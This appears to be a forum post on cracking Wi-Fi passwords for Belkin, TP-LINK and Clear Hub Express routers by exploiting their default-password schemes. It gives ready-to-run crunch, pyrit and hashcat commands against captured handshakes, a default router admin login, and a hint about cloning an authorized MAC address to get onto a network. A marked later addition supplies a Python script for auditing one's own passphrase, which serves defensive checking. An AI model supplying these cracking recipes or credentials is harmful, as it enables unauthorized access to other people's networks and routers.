I think this is interesting:

When pixie dust fails to find your password for Belkin, try Crippled-Master: https://github.com/Konsole512/Crippled and if that fails you can usually get the password by crunching hexadecimal (lower case only) thus:

    crunch 8 8 0123456789abcdef -t @@@@@@@@ -o /root/belkin.lst

Then to test your handshake against that crunched list:

    pyrit -r Belkin.a1b.cap -i /root/belkin.lst attack_passthrough

or with hashcat:

    cudahashcat32 -m 2500 -a 3 -1 0123456789abcdef Belkin.a1b.hccap ?1?1?1?1?1?1?1?1

(change "Belkin.a1b.hccap" to the actual hccap name, of course)

NEXT:

The last few TP-LINK routers I've purchased all use an 8 digit number for both the wifi password AND the wps pin number, so if you can capture a handshake just crunch passthrough for 8 digits. In hashcat that looks like:

    cudahashcat32 -m 2500 -a 3 TP-LINK-abc.hccap ?d?d?d?d?d?d?d?d

NEXT:

When you see an SSID like WiFiRSU_xx it's a Clear Hub Express wifi modem/router. The default wifi password will be all the characters which follow the underslash, with enough digits added to the start to make it 8 characters long. So if you see:

    WiFiRSU_ab1cd

Then the password will be 3 digits added thus:

    @@@ab1cd

So:

    crunch 8 8 0123456789 -t @@@ab1cd -o /root/WiFiRSU.lst

then

    pyrit -r WiFiRSU_ab1cd.cap -i /root/WiFiRSU.lst attack_passthrough

ANOTHER EXAMPLE:

For WiFiRSU_aa the password will be six digits added thus:

    @@@@@@aa

So:

    crunch 8 8 0123456789 -t @@@@@@aa -o /root/WiFiRSU.lst

then

    pyrit -r WiFiRSU_aa.cap -i /root/WiFiRSU.lst attack_passthrough

INFO:

The Clear Hub Express Default Router login is: 192.168.15.1 and user/pass: NONE CLEAR123

I have not tried to connect to one of these so let me know how you make out. (You might have to clone an authorized MAC?)
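For anyone auditing their own router against the default schemes described in the post above, the following is an added example and not part of the original post: it reports which of the three patterns a configured passphrase still fits and how small the resulting keyspace is. The function names and the sample SSID/passphrase pairs are constructed for illustration.

```python
import re

DIGITS = "0123456789"
DIGIT8 = re.compile(r"[0-9]{8}")           # 8-digit default (TP-LINK scheme in the post)
HEX8 = re.compile(r"[0-9a-f]{8}")          # 8 lowercase hex chars (Belkin scheme in the post)
WIFIRSU = re.compile(r"WiFiRSU_(.{1,8})")  # SSID suffix reused in the passphrase


def default_pattern_findings(ssid, psk):
    """Return a list of (pattern name, keyspace size) the passphrase fits."""
    findings = []
    if DIGIT8.fullmatch(psk):
        findings.append(("8 decimal digits", 10 ** 8))
    if HEX8.fullmatch(psk):
        findings.append(("8 lowercase hex characters", 16 ** 8))
    m = WIFIRSU.fullmatch(ssid)
    if m and len(psk) == 8:
        suffix = m.group(1)
        pad = 8 - len(suffix)  # number of leading digits in the default
        if psk[pad:] == suffix and all(c in DIGITS for c in psk[:pad]):
            findings.append(("digits + WiFiRSU SSID suffix", 10 ** pad))
    return findings


def smallest_keyspace(ssid, psk):
    """Smallest keyspace among matching patterns, or None if none match."""
    sizes = [size for _, size in default_pattern_findings(ssid, psk)]
    return min(sizes) if sizes else None


if __name__ == "__main__":
    # Constructed sample pairs, not real credentials.
    samples = [
        ("Belkin.a1b", "0a1b2c3d"),
        ("TP-LINK-abc", "12345678"),
        ("WiFiRSU_ab1cd", "123ab1cd"),
        ("WiFiRSU_aa", "123456aa"),
        ("HomeNet", "correct horse battery staple"),
    ]
    for ssid, psk in samples:
        size = smallest_keyspace(ssid, psk)
        if size is None:
            print(f"{ssid}: no default pattern matched")
        else:
            print(f"{ssid}: factory-style passphrase, keyspace {size:,} - change it")
```

Any match means the passphrase should be replaced with a long random one, and WPS should be disabled where the PIN follows the same scheme.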